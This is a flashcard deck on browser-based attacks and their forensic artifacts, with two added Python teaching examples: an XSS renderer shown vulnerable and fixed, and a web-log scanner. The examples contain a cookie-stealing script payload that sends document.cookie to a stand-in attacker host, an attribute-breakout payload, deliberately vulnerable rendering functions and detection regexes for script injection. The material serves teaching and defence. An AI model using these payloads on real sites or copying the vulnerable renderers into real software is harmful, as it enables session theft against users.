Module 3 - Attacks through Browsers and Add-on Modules Flashcards Preview


Flashcards in Module 3 - Attacks through Browsers and Add-on Modules Deck (17)
1
Q

Browser Vulnerabilities

A
  • all browsers have them; no vendor ships a vulnerability-free browser
  • vendors rely on users to upgrade to new versions and install patches, so unpatched browsers stay exploitable long after a fix exists

2
Q

Browser Helper Objects (BHOs)

A
  • add-on modules (in Internet Explorer, COM DLLs loaded into the browser process) that extend browser functionality, e.g. open PDFs, render graphics, play movies
  • popular as targets because they run inside the browser with its privileges
  • not patched as often as browsers (separate vendor, separate update cycle)
3
Q

Access via Browser

A
  • code launched through the browser or its BHOs usually runs with the same permissions as the logged-in user account, so a user browsing as an administrator hands the attacker administrator rights
4
Q

Browser Intrusion Artifacts (4)

A
  • internet cache
  • account temp directory
  • Windows registry
  • Java Runtime Environment (JRE) files
5
Q

Browser Attacks (method examples)

A
  • exploit configurations
  • change default home page
  • install toolbar
6
Q

IE Home Page Setting

A

HKCU\Software\Microsoft\Internet Explorer\Main, value "Start Page" (the per-user setting, stored in that user's ntuser.dat; the same path under HKLM holds the machine-wide default)

7
Q

IE Add-ons

A

Internet Options (Programs tab)

Manage Add-ons (also reachable from the Tools menu)

8
Q

Safari Extensions

A

Preferences

Extensions

9
Q

Java Runtime Environment (definition)

A

runtime portion of Java software (only thing needed to run Java via web browser)

10
Q

JRE (parts)

A
  • Java Virtual Machine (JVM)
  • Java platform core classes
  • Java platform libraries (supporting libraries)
11
Q

Java plug-in (definition)

A
  • component of JRE
  • allows applets written in Java to run inside browsers
  • not standalone program -> cannot be installed separately.
12
Q

XSS

A

Cross Site Scripting (involves both client and server)

  • loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the context of the attacked site
  • now also covers other modes of code injection, including ActiveX, Java, VBScript, Flash, or HTML scripts
13
Q

XSS Persistent

A
  • less common
  • data supplied by the attacker is saved by the server (comment, profile field, message) and displayed to every visitor on "normal" pages without proper HTML escaping

14
Q

XSS non-persistent

A
  • more common
  • data provided by the web client (HTML query parameters or form submissions) is used by server-side scripts to build and display a results page for that same user without properly escaping it; the victim has to be lured into sending the crafted request (link, form, redirect)
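The following is an added example, not part of the flashcard deck, illustrating cards 12 to 14: a minimal server-side renderer with a reflected (non-persistent) search page and a stored (persistent) comment page, each shown in its vulnerable form and with output escaping applied. The attacker payloads, the `attacker.example` host and the `CommentStore` class are constructed for the example.

```python
"""Reflected vs. stored XSS in a minimal server-side renderer (added example)."""
import html

# Constructed attacker input: a JavaScript fragment prepared by the attacker
# that ships the victim's cookie to an attacker-controlled host (hypothetical).
ATTACK = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'

# Constructed payload for an attribute context: breaks out of value="..." instead of using <script>.
ATTR_ATTACK = '" autofocus onfocus=alert(1) x="'


# --- Non-persistent (reflected) XSS -------------------------------------------
def render_search_vulnerable(q: str) -> str:
    """Query parameter goes straight into the page body: reflected XSS."""
    return f"<h1>Results for: {q}</h1>"


def render_search_fixed(q: str) -> str:
    """Escape at output time, for the context the data lands in (HTML text)."""
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


def render_input_fixed(q: str) -> str:
    """Attribute context: quote=True is what turns the closing quote into &quot;."""
    return f'<input name="q" value="{html.escape(q, quote=True)}">'


# --- Persistent (stored) XSS --------------------------------------------------
class CommentStore:
    """Hypothetical comment storage. Data is stored verbatim; escaping belongs at output."""

    def __init__(self) -> None:
        self._comments: list[str] = []

    def post(self, text: str) -> None:
        # Stored as-is. Escaping on the way in would corrupt legitimate text
        # (and would not cover data that reaches the store by another path).
        self._comments.append(text)

    def render_vulnerable(self) -> str:
        """Every visitor receives the attacker's script: stored XSS."""
        return "".join(f"<p>{c}</p>" for c in self._comments)

    def render_fixed(self) -> str:
        return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in self._comments)


def page_executes_script(page: str) -> bool:
    """Crude check used by the demo: does a raw <script tag survive into the markup?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("reflected, vulnerable:", page_executes_script(render_search_vulnerable(ATTACK)))
    print("reflected, fixed:     ", page_executes_script(render_search_fixed(ATTACK)))
    store = CommentStore()
    store.post("nice article")
    store.post(ATTACK)
    print("stored, vulnerable:   ", page_executes_script(store.render_vulnerable()))
    print("stored, fixed:        ", page_executes_script(store.render_fixed()))
    print(render_input_fixed(ATTR_ATTACK))
```

Note the two different escaping needs: in text content `<` and `>` are enough, but inside an attribute value the attacker needs only a `"` to break out, which is why `quote=True` matters for `render_input_fixed`.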
15
Q

Artifacts for XSS

A
  • emails (for links)
  • web page caches (for links)
  • web server logs
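As an added example (not from the deck) for card 15, the following scans web server access logs for the links that deliver reflected XSS: it parses combined-format lines, URL-decodes each query parameter (twice, to catch double encoding) and reports parameters carrying script indicators together with the referring site that lured the victim. The log lines, hosts and indicator list are constructed for the example and are not real traffic.

```python
"""Find XSS delivery links in web server logs (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=laptops HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5333 "http://evil.example/lure.html" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "POST /comment HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /profile?name=%22%20onmouseover%3Dalert(1)%20x%3D%22 HTTP/1.1" 200 2048 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicators of injected script or HTML in a decoded parameter (a starting list, not exhaustive).
XSS_INDICATORS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"<\s*script",                    # script tag
        r"javascript\s*:",                # javascript: URL
        r"\bon[a-z]+\s*=",                # event handler attribute (onmouseover=, onerror=, ...)
        r"<\s*(iframe|img|svg|object|embed)\b",
        r"document\.(cookie|location)",   # typical cookie-theft / redirect payload
    )
]


def decode_params(path: str) -> list[tuple[str, str]]:
    """Split the query string and decode each value; a second unquote catches double encoding."""
    query = urlsplit(path).query
    return [(k, unquote(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def scan(log_text: str) -> list[dict]:
    """Return one finding per parameter that matches an XSS indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in decode_params(m["path"]):
            for indicator in XSS_INDICATORS:
                if indicator.search(value):
                    findings.append({
                        "ip": m["ip"],
                        "ts": m["ts"],
                        "param": name,
                        "value": value,
                        "indicator": indicator.pattern,
                        "referer": m["referer"],
                        "status": m["status"],
                    })
                    break  # one finding per parameter is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} referer={f['referer']} -> {f['value']!r}")
```

A status of 200 on the flagged request is worth noting: the server rendered the payload rather than rejecting it, and the referer of the second line is the "unrelated attack site" of card 12.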
16
Q

Locations of browser caches

A

inside each user's browser profile directory (under the user's profile on Windows, e.g. below AppData), so one cache per user account and per browser

17
Q

Artifacts for BHOs

A
  • registry: the BHO's CLSID under SOFTWARE\Classes\CLSID (in ntuser.dat for per-user registrations), and the list of loaded BHOs under SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
  • JAR files in the Java deployment cache (C:\Users\<username>\AppData\LocalLow\Sun\Java\Deployment\cache)